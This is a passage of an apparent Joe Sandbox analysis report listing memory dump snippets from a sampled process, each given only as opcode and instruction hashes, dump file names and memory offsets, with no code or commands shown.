                                                            • Instruction ID: 2e051d98fc287dc59e6a238fdd626f41425527213e4f40acc1caf7df978e6209
                                                            • Opcode Fuzzy Hash: b322e493b5979ee64cb09f1a717a9422ffc42097c4440205e895b9ce9eb75fe0
                                                            • Instruction Fuzzy Hash: 7D012C3090868C8FCB85EF24C895AA97FB0EF69301F1500AAD408C7292D735D595CB80
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6faac8be7fbe180dbdeed7777fc63d42a5887c9ea9d7c5c080c9c12279ce8b5a
                                                            • Instruction ID: ca2e0f2ea9a4a220e7ceda166bc0a6c8390cf76aedf487dcafcc5a25be9d7e9a
                                                            • Opcode Fuzzy Hash: 6faac8be7fbe180dbdeed7777fc63d42a5887c9ea9d7c5c080c9c12279ce8b5a
                                                            • Instruction Fuzzy Hash: 9F014B7190869DCFCB9AEF68C8546E97BB0FF25301F0505EBD418D72A2DB349944CB41
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4825d228f4eb5890cf384386194724af39e3fa4e7cd15f082f88db4cad2c5f94
                                                            • Instruction ID: 885b440bcc2686c704b5f473f56aa2b0ee8daa80767fdf7270f293e2471bc7a4
                                                            • Opcode Fuzzy Hash: 4825d228f4eb5890cf384386194724af39e3fa4e7cd15f082f88db4cad2c5f94
                                                            • Instruction Fuzzy Hash: 5811393084861A8FDF39EF00C850BF973B5FF94340F0042B9C41AA6680EB74AA84DF80
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F2B000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f2b000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0c14a007a32fbe3bdaf649112042226032c48832a3ef13602e4eabfb985d6c04
                                                            • Instruction ID: d44144bae78a3603683b2a382a8c45ca5aa1b63d331d7057cc37e7cca0dfbbd8
                                                            • Opcode Fuzzy Hash: 0c14a007a32fbe3bdaf649112042226032c48832a3ef13602e4eabfb985d6c04
                                                            • Instruction Fuzzy Hash: F711E570908529CFEB68EF54C8887E8B3B1FB58345F5085EA840EA32D0DB795A85CF15
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ad9ea2029e4d0d43dc268b89bee550320ff333c5a5affa8cb263c77f2ac82ad2
                                                            • Instruction ID: e9933f22d518310a373380c60ec41d199920f9fdde08bd91bc34ef47d79c5fe1
                                                            • Opcode Fuzzy Hash: ad9ea2029e4d0d43dc268b89bee550320ff333c5a5affa8cb263c77f2ac82ad2
                                                            • Instruction Fuzzy Hash: D301C930914A4D9FDF84EF58C849AEA7BE0FF69305F54056AA80DD3290DB31E594CB91
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 951219dbf439669ee3e2b76314aa6810bb604ae5dfe748b067977113f9a43f30
                                                            • Instruction ID: e6adb2e8114fd10b7a83ff59128d8069fdcfcb779cc1d3c15c3b59ab70881961
                                                            • Opcode Fuzzy Hash: 951219dbf439669ee3e2b76314aa6810bb604ae5dfe748b067977113f9a43f30
                                                            • Instruction Fuzzy Hash: B601BB74918A4D8FDF84EF68C848AAEBBF0FF68341F1405AAD419D3250DB719594CB80
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 08e187204af222d4ff3f75eb9d73990bb55597384b8e049473d8b214a3818c4b
                                                            • Instruction ID: a169334321085cdfa819f841d48ba902718737b44a89aa3dd3ee55eb9e99911c
                                                            • Opcode Fuzzy Hash: 08e187204af222d4ff3f75eb9d73990bb55597384b8e049473d8b214a3818c4b
                                                            • Instruction Fuzzy Hash: DA017974914A4D9FDF84EF68C848AAEBBF0FB68305F14456AA419D3250DB71A594CB80
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4b167383e596f52e971ee5063ac4682a8aa63f05fc0e0de8650381db67e41b24
                                                            • Instruction ID: 7caa46027b3ec7e8ed66720091b7e4021061baef1c9ce5f5c92c0f7d1eb0ddd8
                                                            • Opcode Fuzzy Hash: 4b167383e596f52e971ee5063ac4682a8aa63f05fc0e0de8650381db67e41b24
                                                            • Instruction Fuzzy Hash: 3701C930918A4D9FDF84EF68C849AEABBE0FB68305F10016AE40DD3294DB31A594CB81
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3b46823db08987ca97dbf0ceff78fcbb26dad23dfe668f46fbd20c45033355ab
                                                            • Instruction ID: f2766ee18b52cd25e8a483c70f1f72025d6f774ecadf2d18d0bffe734aa5de3f
                                                            • Opcode Fuzzy Hash: 3b46823db08987ca97dbf0ceff78fcbb26dad23dfe668f46fbd20c45033355ab
                                                            • Instruction Fuzzy Hash: B2F0F63284D2CA9FDB16DF708C124E57FB8EF43240B1801FAE049C70A2C92C9606D351
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 088c5b3d980576125cf4df957423e60b523a56b89893c72ff907c1938f61b6fb
                                                            • Instruction ID: 5f222d00104ac2e12073f5becc60d9c40621a7edbe0e407220e37d225c5409dd
                                                            • Opcode Fuzzy Hash: 088c5b3d980576125cf4df957423e60b523a56b89893c72ff907c1938f61b6fb
                                                            • Instruction Fuzzy Hash: ED01443110C5828FCB19EF6CD4916F87790EF92360F1442AAE505C76A1CA59A410C780
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3a743b8bdc88fb2a8bbf5406fcc6f7c5798793db020539938a4ef4a6081e420a
                                                            • Instruction ID: c8228f04f5c13c8634edb3c605bfb78b7454121d18456e79d3c374f431ea1a06
                                                            • Opcode Fuzzy Hash: 3a743b8bdc88fb2a8bbf5406fcc6f7c5798793db020539938a4ef4a6081e420a
                                                            • Instruction Fuzzy Hash: 57014F3080978C8FCB45DF18C859AA97FF0FF65301F1501DAD408D71A2D7399955CB41
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5ef98b77dfb1fadc58373b5eae26227f2dbf3a65c7967a50a7e4bc87fecb544e
                                                            • Instruction ID: 50204fbbefc4a09aa48e4bfc5575f8ce3608c5df61ac924b5bf01742dae0be99
                                                            • Opcode Fuzzy Hash: 5ef98b77dfb1fadc58373b5eae26227f2dbf3a65c7967a50a7e4bc87fecb544e
                                                            • Instruction Fuzzy Hash: F6F0623184E2C99FDB26AF7098255E97FA4EF42244B1800EAE0598B0A3C96D9A16C761
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f10000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d679c3089556d6ce530c289d18db8871e9364d1e66b8bde82d4b518b3449507e
                                                            • Instruction ID: 9f834ed20d2cae597e0bcbeee1b01f789752db09c0b92f6baa486d09685b7998
                                                            • Opcode Fuzzy Hash: d679c3089556d6ce530c289d18db8871e9364d1e66b8bde82d4b518b3449507e
                                                            • Instruction Fuzzy Hash: 60011B30E0992A9FEB65EB14CC54BE9B6B1EF85351F1042F5D00E962D2CB786EC18F84
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5bb09dcbe25e4a5313b38c11261d12bd9027951115786b42e5f9f872b046d18a
                                                            • Instruction ID: c6e63b9d881eb926d664473937a970fa7fa1c3c2a4bf4db2f666dedff010be13
                                                            • Opcode Fuzzy Hash: 5bb09dcbe25e4a5313b38c11261d12bd9027951115786b42e5f9f872b046d18a
                                                            • Instruction Fuzzy Hash: BEF0E730914A4C9FCF44EF58C889AEABBF0FB68305F0005AAA80DD3250DB31A594CB81
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5f4b323421b15bb56d72d8ce3bc15053e4c188089fd99ad4ae2d420d98abc73d
                                                            • Instruction ID: bc27996610f784ab64a919fd3bcbb9ebfca1567ffe50c19b5a6fe10d57499f24
                                                            • Opcode Fuzzy Hash: 5f4b323421b15bb56d72d8ce3bc15053e4c188089fd99ad4ae2d420d98abc73d
                                                            • Instruction Fuzzy Hash: 7D016070909A5C8FDFA8DF18D894FA9B7B2FB68300F1041AAD04EE3250CB719A85CF00
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 317b98d6dc0a3d44a592e2fc4b217baefb675def0aa4c25fde6d051689c7e384
                                                            • Instruction ID: 64b35c54a6d4bae831b4cf5e03de750f7f85cabad35fd5e8af269245112e2623
                                                            • Opcode Fuzzy Hash: 317b98d6dc0a3d44a592e2fc4b217baefb675def0aa4c25fde6d051689c7e384
                                                            • Instruction Fuzzy Hash: CD01AD71C0D6C99FDB52AF2888592A87FA0FF16200F0902FBD408D61D3EB3C54888752
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0bec9983d7afce5b88bf1acab73da55efdbaee559ae565a63c672b4444f8c15d
                                                            • Instruction ID: 4bb30f91f9e8ba8e4bfacd3c529b75fef0db43f7d5cd7f7e59bce557d19a201b
                                                            • Opcode Fuzzy Hash: 0bec9983d7afce5b88bf1acab73da55efdbaee559ae565a63c672b4444f8c15d
                                                            • Instruction Fuzzy Hash: 7CF0EC74918A0DCFCF84EF58C848AAEB7F0FB68305F00056AA419D3290DB319650CB80
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F48000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F48000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f48000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2ed5842d2443c45097172ed6b82d08c16eec121eea1735b2d2992c9b000bd00a
                                                            • Instruction ID: 9425b9ea2530b3e8f0ca626eef9ee02413d853d36ff6f0caf839bc546d970c28
                                                            • Opcode Fuzzy Hash: 2ed5842d2443c45097172ed6b82d08c16eec121eea1735b2d2992c9b000bd00a
                                                            • Instruction Fuzzy Hash: 89F0C230D1C5998EE744EB68C59AABDBBE0FF64758F40017AC00EEB2D6CFA424418B44
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F2B000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f2b000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6d3960cefec910cbba1616048e5c569f1fe4567bfc0b8d75fab8ca637bb1b198
                                                            • Instruction ID: cf52eccf1b74929342b3832dde5542f2e921e2c4f54c7ad49eb007ce16794b6b
                                                            • Opcode Fuzzy Hash: 6d3960cefec910cbba1616048e5c569f1fe4567bfc0b8d75fab8ca637bb1b198
                                                            • Instruction Fuzzy Hash: 3AF0E231E0881A8FEB58EB54C854AFDBBB1EB94751F20067BC856A3295CF786A418B44
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 92369b18d8b88985854b5f8fb744765031bac5cbdab5400f890081ddb5fcfcb2
                                                            • Instruction ID: 36232678be163704eee13329bb35c5d365a1b974af54bffe198e58d61c8014e7
                                                            • Opcode Fuzzy Hash: 92369b18d8b88985854b5f8fb744765031bac5cbdab5400f890081ddb5fcfcb2
                                                            • Instruction Fuzzy Hash: E8F0BD3091494DDFDF85EF58C448AAABBF1FB68305F1041AAA41DD3150DB31D694CB80
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1978011fbeeb830c1311157798d618f16fc5adbf259d4e51732c43783236036c
                                                            • Instruction ID: 1362b88ed814ce2934f285d3fcaa622a3d2c9c5cb520b1e26d2b697727dbc15f
                                                            • Opcode Fuzzy Hash: 1978011fbeeb830c1311157798d618f16fc5adbf259d4e51732c43783236036c
                                                            • Instruction Fuzzy Hash: F0F06771A4D6899FCB029F24C8658993FB0EF66300B0A01E7D009CB1A3CB299D0ACB10
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f10000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0036f22594962d74c012719c95f50c5cf72f415a02565454061eeef0c3b0b63c
                                                            • Instruction ID: 8625cb790fcbb626d70799589610566987fa57f6065a7a99cecac6cbbab37635
                                                            • Opcode Fuzzy Hash: 0036f22594962d74c012719c95f50c5cf72f415a02565454061eeef0c3b0b63c
                                                            • Instruction Fuzzy Hash: F401E870D4C52B8FEBA4EF18D844AB976A1FF94391F0001B9D11DD26C5CB386E818B04
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5b619284383ba7722f866dd27ff584af8d5b5bf4ae2c97488cf11a69ccfb06b4
                                                            • Instruction ID: a4043529097e4a025b8b23797dbc8260f3771506dd05818eab9989b751c491a3
                                                            • Opcode Fuzzy Hash: 5b619284383ba7722f866dd27ff584af8d5b5bf4ae2c97488cf11a69ccfb06b4
                                                            • Instruction Fuzzy Hash: E6F0D030914A4D9FDF84EF58C444AEA7BF0FF68305F5041AAE41DD3290DB35A595CB80
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c5a1271adb69a4341039e00b4d7f87d61b4c33ff7d963d27c84a2513bc248284
                                                            • Instruction ID: 8a94671482f181adbced0942f87f843e3c4201dc650206c322abbd15e4e9194d
                                                            • Opcode Fuzzy Hash: c5a1271adb69a4341039e00b4d7f87d61b4c33ff7d963d27c84a2513bc248284
                                                            • Instruction Fuzzy Hash: DD01E831D19569DFEF24EF88D884AECB3B6FB95341F10016AD406A7290DB786A44CB00
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 23c8fce7f8dfce205da29881b37a84d7656611c0e446e2961bcf3b46133d7a5b
                                                            • Instruction ID: 80f52bb0b823afb4f9771347ceb76f01d5b12938aa9e68e12c29d45adf2ea5eb
                                                            • Opcode Fuzzy Hash: 23c8fce7f8dfce205da29881b37a84d7656611c0e446e2961bcf3b46133d7a5b
                                                            • Instruction Fuzzy Hash: 01F03430A1891C8FCF98EF08D884A9A77F0FB69316F4012A9D04DD7280E731AA85CF41
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 60ac8f4fe8c59fa0a7cdddd2355df3c8ffabd6bf151cf443d55558c976a65a02
                                                            • Instruction ID: 4c1d803fdf42599edcc83a63c5dac5ea17403e5e5e355b1e8d9901c07ce7940f
                                                            • Opcode Fuzzy Hash: 60ac8f4fe8c59fa0a7cdddd2355df3c8ffabd6bf151cf443d55558c976a65a02
                                                            • Instruction Fuzzy Hash: A8F0D030E0E68ACEEF78EF4494553FD77A8AF48391F54113AD41EE21C5CE3968419B14
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3df4afb3f2612e4cf3038bf468021f76d73d355e4287fa2359d51e8f6d3bf6ec
                                                            • Instruction ID: c0bd70fffca572bbd41dccea0064630b4fceb0f906ae16d80229167091217903
                                                            • Opcode Fuzzy Hash: 3df4afb3f2612e4cf3038bf468021f76d73d355e4287fa2359d51e8f6d3bf6ec
                                                            • Instruction Fuzzy Hash: E8F0A030608988CFD798EF2C841663C77E2FFA8341B15457FA44AE3AB2CE64E8408781
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f10000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2404bbe67c1536c9c039044d4413a03294fe260647659678ba8ec97f817f6f4d
                                                            • Instruction ID: 001c824c259de38666fb7c604531989e726811e2a5bf998b2bdafef1cc979813
                                                            • Opcode Fuzzy Hash: 2404bbe67c1536c9c039044d4413a03294fe260647659678ba8ec97f817f6f4d
                                                            • Instruction Fuzzy Hash: F3F04930D0D52ACFE704EB54C8443FAB2B0FB81311F040A79D415A72C2CB786A848B85
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f10000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 930eba56ae668985a1e7d7028f55b783b1e319dd1962b819aa55904939355b09
                                                            • Instruction ID: 95357ff0ba89b2a016f996b6a55dc9a22a3882b8c22f3668d7ae54b96f4049fc
                                                            • Opcode Fuzzy Hash: 930eba56ae668985a1e7d7028f55b783b1e319dd1962b819aa55904939355b09
                                                            • Instruction Fuzzy Hash: CBF01C3190812ACEDB64EF00C8907A873F1FB54751F5441B9D04DA62D0DF786E84CF44
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d9e88d407b79c42e2dd2723aac8d96ff769b991f32a6a946201aa368113ac6f2
                                                            • Instruction ID: 15a39dc7bc44f5466b958b0b28179e35f5548084af109f3732ae08859675c0f9
                                                            • Opcode Fuzzy Hash: d9e88d407b79c42e2dd2723aac8d96ff769b991f32a6a946201aa368113ac6f2
                                                            • Instruction Fuzzy Hash: 53E08630D0C6468EE7549B149C523A837A0EF45341F0113FBC84CB31D2DF391D475A15
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ce20f4f7d81339aa8846bd31e6ec7b04bd07c80ce3b036d55d89ad384defccce
                                                            • Instruction ID: 0f5c687fa6bdea88ba0ec8e1320cbb393845812c89b002e4b0a084aaea08221b
                                                            • Opcode Fuzzy Hash: ce20f4f7d81339aa8846bd31e6ec7b04bd07c80ce3b036d55d89ad384defccce
                                                            • Instruction Fuzzy Hash: 12E01270D0D6558EE3A4AB28DC986E877A1FF45342F0013FBD00DB21D3EE7419939A09
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6664d538d9749f507b5de5dcd0dfd76e1cdf3db562c0b49874290dd5c51ddb3a
                                                            • Instruction ID: 1d695793385ad4ae3459d99fd5e8c775d31b87eab03018eaf7ef23dcac57a22c
                                                            • Opcode Fuzzy Hash: 6664d538d9749f507b5de5dcd0dfd76e1cdf3db562c0b49874290dd5c51ddb3a
                                                            • Instruction Fuzzy Hash: BBE09A71C082288EDB289F64D8917ECB7B0FB54345F0001AED04EA6282DB795685DF45
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b8a9afd5d17703bde797dbe0340c9b139090bff505a90ec81b21a96523bc0945
                                                            • Instruction ID: d7f00b75247c4068d8761d482595f2786cb0118c9e23d5eb5bc34b3fd3a9c132
                                                            • Opcode Fuzzy Hash: b8a9afd5d17703bde797dbe0340c9b139090bff505a90ec81b21a96523bc0945
                                                            • Instruction Fuzzy Hash: 22E01251E0D3C25FFF3A2A7418641792F949F073857591AB6D0498A1D3D94868059711
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bc34e56fadfbafcb2c925d2f1461dfb8f52cffb65a1feae7d5ad1be47a144548
                                                            • Instruction ID: 114c6bb25beed125a146ac2290da64e7180c1eb8aae63590cd5e4b7b1d1857ac
                                                            • Opcode Fuzzy Hash: bc34e56fadfbafcb2c925d2f1461dfb8f52cffb65a1feae7d5ad1be47a144548
                                                            • Instruction Fuzzy Hash: D8D05E92E1E8C69FE968AE6C44223B42186FF89B90F040478E20EC31CBCD1CAC910183
